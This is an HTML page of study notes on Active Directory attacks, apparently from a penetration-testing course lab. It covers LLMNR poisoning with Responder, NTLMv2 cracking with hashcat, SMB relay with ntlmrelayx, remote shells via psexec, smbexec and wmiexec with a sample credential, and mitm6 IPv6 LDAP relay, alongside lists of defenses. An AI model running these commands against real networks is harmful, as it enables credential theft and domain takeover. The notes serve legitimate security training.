<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>AD initial Attack Vectors</title>
</head><body><b>==================================================<span style="font-size: 11pt"><br/>
</span><span style="font-size: 11pt">LLMNR (Link local Multicast Name resolution) Poisoning:</span><br/>
==================================================<br/>
</b><span style="font-size: 10pt"><div style="text-align: left"><span style="font-family: arial">The Link-Local Multicast Name Resolution (</span></div>LLMNR<div style="text-align: left"><span style="font-family: arial">) is a protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link<b>.</b></span></div><b><br/>
</b></span><b><span style="font-size: 10pt">&nbsp;</span><br/>
</b>LLMNR used to identify hosts when DNS fails to do so, Previously NBT-NS.<br/>
Key flaw is that the services utilize a user's username and NTLMv2 hash when appropriately responded to.<br/>
<br/>
Impacket<br/>
<b>Responder:</b>&nbsp;Responder.py -I eth0 -rdwv<br/>
<b>Hashcat:</b>&nbsp;hashcat -m 5600 hashes.txt rockyou.txt<br/>
<u><br/>
</u><u><b><span style="font-size: 11pt">Defenses:</span></b></u><br/>
1- Disable LLMNR<br/>
2- Disable Nbt-ns<br/>
<br/>
<b>If disabling is not possible:<br/>
</b>1- Require Network access control<br/>
2- Require strong user password<br/>
<br/>
<br/>
<b>==================================================</b><br/>
<b><span style="font-size: 11pt">SMB RELAY:</span><br/>
==================================================<br/>
</b>Instead of cracking hashes gathered with Responder, we can instead relay those<br/>
hashes to specific machines and potentially gain access<br/>
<br/>
<b>Conditions:</b><br/>
1- SMB sigining must be disabled on the target<br/>
2- Relayed user creds must be admin on machine <br/>
3- We cant relay hashes from the same machine back to it [Two seperate machines]<br/>
<br/>
<b>SMB Signing</b>&nbsp;is a feature through which communications using SMB can be digitally signed at the packet level. Digitally signing the packets enables the recipient of the packets to confirm their point of origination and their authenticity [Disabled by default on any worksatation and <br/>
Enabled and required on any server by default]<br/>
<br/>
We have to <b>set HTTP and SMB to off within Responder.conf</b>. , So we will be listening but<br/>
not responding on them [We will use responder to capture, and another tool to relay].<br/>
<br/>
# ntlmrelayx.py -tf targets.txt -smb2support<br/>
<br/>
<br/>
<b>1 &gt;&gt;&gt; Discovering Hosts with SMB sigining Disabled:<br/>
</b>nmap --script=smb2-security-mode.nse -p445 192.168.1.1/24<br/>
<br/>
<b>2 &gt;&gt;&gt; Editing Responder configurations [Turning off HTTP and SMB]<br/>
</b>nano /etc/responder/Responder.conf <b><br/>
</b><br/>
<b>3 &gt;&gt;&gt; Settingup the relay<br/>
</b># ntlmrelay.py -tf targets.txt -smb2support <br/>
<br/>
<b>4 &gt;&gt;&gt; Getting interactive shell</b><br/>
# ntlmrelayx.py -tf targets.txt -smb2support <br/>
# nc 127.0.0.1 port_shown_at_responder -i <br/>
[i] = To get interactive shell on the target <br/>
#shares &nbsp; &gt;&gt;&gt; to list all shares on device<br/>
#use share_name<br/>
<br/>
[e] = to execute a binary at the target side [we can use a meterpreter reverseshell EXE]<br/>
[c] = Execute a specific command on the target <br/>
<br/>
<br/>
<b><span style="font-size: 11pt"><u>Defenses:</u><br/>
</span></b><span style="font-size: 11pt">- Enable SMB siging on all devices<br/>
&gt; Pro: completetly stops the attack &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&gt; Con: can cause performance issues with file copies<br/>
<br/>
- Disable NTLM authentication on network<br/>
&gt; Pro: Completely stops the attacks &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&gt; Con: If KERBEROS stops working windows default back to NTLM<br/>
<br/>
- Account tiering <br/>
&gt; Pro: Limits domain admins to specific tasks &nbsp; &nbsp;&gt; Con: Enforcing the policy may be difficult<br/>
<br/>
- Local Admin Restriction<br/>
&gt; Pro: Can preevent a lot of lateral movements &nbsp; &gt; Con: Potential increase in the ammount of service desk tickits<br/>
<b><br/>
<br/>
<u>Gaining Shell Access:<br/>
</u><br/>
Using Known Creds to login to remote host over SMB<br/>
</b><b>1- </b>Option1: /exploit/windows/smb/psexec<br/>
<b><br/>
</b><b>2- </b>Option2: using psexec.py<b><br/>
</b><b>Ex. #</b>&nbsp;psexec.py MARVEL.local/fcastle:ammar46!@target<br/>
<br/>
<b>3- </b>Option3: using smbexec.py<br/>
<b>Ex. #</b>&nbsp;smbexec.py MARVEL.local/fcastle:ammar46!@target<br/>
<br/>
4<b>- </b>Option4: using wmiexec.py<br/>
<b>Ex. #</b>&nbsp;wmiexec.py MARVEL.local/fcastle:ammar46\!\@target<br/>
<br/>
<br/>
<b><br/>
</b></span><b>========================================================<br/>
<span style="font-size: 11pt">IPv6 Attacks Overview:<br/>
==================================================<br/>
<br/>
<u>Methodology:</u><br/>
<br/>
</span></b><span style="font-size: 11pt">&gt;&gt; DNS takeover attacks over IPv6<b>&nbsp;<br/>
</b><b><br/>
</b>&gt;&gt; IPv6 is turned on at hosts, No one doing DNS for IPv6<br/>
<br/>
&gt;&gt; We will listen to all IPv6 messages <br/>
<br/>
&gt;&gt; When this happen we will be able to get authentication to Domain Controller via LDAP or via SMB <br/>
<br/>
&gt;&gt; when a machine reboot, there will be a trigger for event, this event will report to us , and then we can use that machine to login to the DC.<br/>
<br/>
&gt;&gt; The target Machine doesnt have to be an admin, we Can use that machine to &nbsp; &nbsp;create another machine , and then we will be waiting someone to login to the network or user creds somewhere and that will come to us &nbsp;in a form of NTLM <br/>
<br/>
&gt;&gt; then we will relay the NTLM to the DC [LDAP Relaying], then we will login to the DC if we are a domain administrator using [MITIM6].<b><br/>
</b><b><br/>
</b>&gt;&gt; We will combine the work of NTLMrelayx with MITM6 and it will relay to the LDAP, and it will create an acoount for us.<b><br/>
</b><b><br/>
<br/>
<u>Setting-up LDAPS [@DC side]:<br/>
</u></b>&gt;&gt; Adding Certificate<br/>
Manage &gt; Add features and rules &gt; AD certificate services &gt; Add features<br/>
<br/>
<br/>
<br/>
<u><b>Attack Phase:</b></u><br/>
mitm6 -d marvel.local<br/>
ntlmrelayx.py -6 -t ldaps://DC_IP -wh fakewpad.marvel.local -l lootme<b><br/>
</b><b><br/>
<br/>
<br/>
<br/>
<br/>
</b></span><br/>
<br/>
<br/>
</body></html>